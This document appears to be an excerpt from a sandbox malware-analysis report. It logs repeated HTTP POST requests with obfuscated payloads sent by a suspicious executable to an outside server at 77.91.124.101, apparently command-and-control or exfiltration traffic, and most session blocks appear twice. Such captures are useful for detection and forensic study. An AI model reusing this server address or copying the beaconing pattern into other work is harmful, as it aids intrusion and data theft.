Nov 21, 2023 04:48:41.333384037 CET	604	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:41.532224894 CET	604	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:41.532480001 CET	606	OUT	Data Raw: 52 58 58 59 5b 5f 5f 59 5d 57 55 57 55 5d 57 56 50 52 58 47 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RXXY[__Y]WUWU]WVPRXGVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=>?>V#88'2\45(#='>&' .S,((?(->&G''^)+
Nov 21, 2023 04:48:41.736088991 CET	607	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	77.91.124.101	80	192.168.2.5	49827	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:41.333384037 CET	604	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:41.532224894 CET	604	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:41.532480001 CET	606	OUT	Data Raw: 52 58 58 59 5b 5f 5f 59 5d 57 55 57 55 5d 57 56 50 52 58 47 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RXXY[__Y]WUWU]WVPRXGVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=>?>V#88'2\45(#='>&' .S,((?(->&G''^)+
Nov 21, 2023 04:48:41.736088991 CET	607	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	192.168.2.5	49828	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:42.070585966 CET	608	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:42.268085957 CET	608	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:42.268487930 CET	610	OUT	Data Raw: 57 50 5d 5a 5b 5d 5f 5a 5d 57 55 57 55 5b 57 53 50 53 58 48 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]Z[]_Z]WUWU[WSPSXHV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\']=81Y?>=;7:=?%$-*S'"T-_?<;^,&G''^)3
Nov 21, 2023 04:48:42.472783089 CET	611	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	77.91.124.101	80	192.168.2.5	49828	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:42.070585966 CET	608	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:42.268085957 CET	608	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:42.268487930 CET	610	OUT	Data Raw: 57 50 5d 5a 5b 5d 5f 5a 5d 57 55 57 55 5b 57 53 50 53 58 48 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WP]Z[]_Z]WUWU[WSPSXHV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\']=81Y?>=;7:=?%$-*S'"T-_?<;^,&G''^)3
Nov 21, 2023 04:48:42.472783089 CET	611	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	77.91.124.101	80	192.168.2.5	49829	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:42.804671049 CET	612	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:43.003443956 CET	612	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:43.004524946 CET	614	OUT	Data Raw: 52 5c 5d 5d 5b 59 5a 5f 5d 57 55 57 55 5b 57 51 50 5a 58 42 56 56 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\]][YZ_]WUWU[WQPZXBVVWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\>-<;"U)3,'2_ :( =$.>S&#>R.+*_?7,.&G''^)3
Nov 21, 2023 04:48:43.210524082 CET	615	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	192.168.2.5	49829	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:42.804671049 CET	612	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:43.003443956 CET	612	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:43.004524946 CET	614	OUT	Data Raw: 52 5c 5d 5d 5b 59 5a 5f 5d 57 55 57 55 5b 57 51 50 5a 58 42 56 56 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\]][YZ_]WUWU[WQPZXBVVWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\>-<;"U)3,'2_ :( =$.>S&#>R.+*_?7,.&G''^)3
Nov 21, 2023 04:48:43.210524082 CET	615	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	77.91.124.101	80	192.168.2.5	49830	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:43.542810917 CET	616	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:43.744493961 CET	616	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:43.744719028 CET	618	OUT	Data Raw: 52 5f 58 5e 5b 59 5a 5d 5d 57 55 57 55 5a 57 5a 50 58 58 48 56 52 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_X^[YZ]]WUWUZWZPXXHVRW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_<+>S#',B1"96+0'-)$#&-;<,/.&G''^)7
Nov 21, 2023 04:48:43.947633028 CET	619	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	192.168.2.5	49830	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:43.542810917 CET	616	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:43.744493961 CET	616	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:43.744719028 CET	618	OUT	Data Raw: 52 5f 58 5e 5b 59 5a 5d 5d 57 55 57 55 5a 57 5a 50 58 58 48 56 52 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_X^[YZ]]WUWUZWZPXXHVRW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_<+>S#',B1"96+0'-)$#&-;<,/.&G''^)7
Nov 21, 2023 04:48:43.947633028 CET	619	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	192.168.2.5	49831	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:44.269886017 CET	620	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:44.469629049 CET	620	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:44.470208883 CET	622	OUT	Data Raw: 52 5f 58 5b 5b 5e 5f 5e 5d 57 55 57 55 5a 57 55 50 5f 58 45 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_X[[^_^]WUWUZWUP_XEV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^==Y=;!>#3,4]4:=\+%3V$ 9,(*(+,&G''^)7
Nov 21, 2023 04:48:44.675368071 CET	623	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	77.91.124.101	80	192.168.2.5	49831	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:44.269886017 CET	620	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:44.469629049 CET	620	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:44.470208883 CET	622	OUT	Data Raw: 52 5f 58 5b 5b 5e 5f 5e 5d 57 55 57 55 5a 57 55 50 5f 58 45 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_X[[^_^]WUWUZWUP_XEV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^==Y=;!>#3,4]4:=\+%3V$ 9,(*(+,&G''^)7
Nov 21, 2023 04:48:44.675368071 CET	623	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	77.91.124.101	80	192.168.2.5	49832	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:45.006195068 CET	623	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:45.203978062 CET	624	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:45.355977058 CET	625	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	192.168.2.5	49832	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:45.006195068 CET	623	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:45.203978062 CET	624	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:45.355977058 CET	625	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	192.168.2.5	49833	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:45.353457928 CET	624	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:45.553359032 CET	626	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:45.553590059 CET	627	OUT	Data Raw: 52 58 5d 59 5b 5d 5f 59 5d 57 55 57 55 5a 57 57 50 5a 58 43 56 53 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RX]Y[]_Y]WUWUZWWPZXCVSWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*+1^(;==3^;$97%]?U='-Q$ 1:]=??#_/>&G''^)7
Nov 21, 2023 04:48:45.755808115 CET	630	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:45 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 5d 32 01 38 58 37 30 37 1d 2b 14 2e 0e 39 3e 3e 45 28 33 22 06 27 2e 3b 02 33 29 39 51 3d 2c 3f 00 33 3a 2c 57 20 36 3f 04 2b 20 21 5a 0c 1d 26 5c 36 3b 27 54 3f 58 3c 58 29 3e 23 02 32 0f 27 5e 3c 07 33 16 34 30 38 00 26 33 28 50 2e 3f 2d 5f 2f 3b 32 0b 31 02 2d 00 23 3d 23 5f 0c 14 24 0c 21 0f 2c 00 22 23 3a 12 23 27 16 14 37 37 37 1e 33 3d 0e 55 25 06 29 1a 3c 38 0a 53 32 34 27 0d 30 14 3c 0a 25 00 23 13 3c 3a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "]28X707+.9>>E(3"'.;3)9Q=,?3:,W 6?+ !Z&\6;'T?X<X)>#2'^<3408&3(P.?-_/;21-#=#_$!,"#:#'7773=U%)<8S24'0<%#<:&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	77.91.124.101	80	192.168.2.5	49833	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:45.353457928 CET	624	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:45.553359032 CET	626	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:45.553590059 CET	627	OUT	Data Raw: 52 58 5d 59 5b 5d 5f 59 5d 57 55 57 55 5a 57 57 50 5a 58 43 56 53 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RX]Y[]_Y]WUWUZWWPZXCVSWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*+1^(;==3^;$97%]?U='-Q$ 1:]=??#_/>&G''^)7
Nov 21, 2023 04:48:45.755808115 CET	630	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:45 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 5d 32 01 38 58 37 30 37 1d 2b 14 2e 0e 39 3e 3e 45 28 33 22 06 27 2e 3b 02 33 29 39 51 3d 2c 3f 00 33 3a 2c 57 20 36 3f 04 2b 20 21 5a 0c 1d 26 5c 36 3b 27 54 3f 58 3c 58 29 3e 23 02 32 0f 27 5e 3c 07 33 16 34 30 38 00 26 33 28 50 2e 3f 2d 5f 2f 3b 32 0b 31 02 2d 00 23 3d 23 5f 0c 14 24 0c 21 0f 2c 00 22 23 3a 12 23 27 16 14 37 37 37 1e 33 3d 0e 55 25 06 29 1a 3c 38 0a 53 32 34 27 0d 30 14 3c 0a 25 00 23 13 3c 3a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "]28X707+.9>>E(3"'.;3)9Q=,?3:,W 6?+ !Z&\6;'T?X<X)>#2'^<3408&3(P.?-_/;21-#=#_$!,"#:#'7773=U%)<8S24'0<%#<:&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
119	192.168.2.5	49834	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:45.470352888 CET	626	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:45.667021990 CET	627	IN	HTTP/1.1 100 Continue
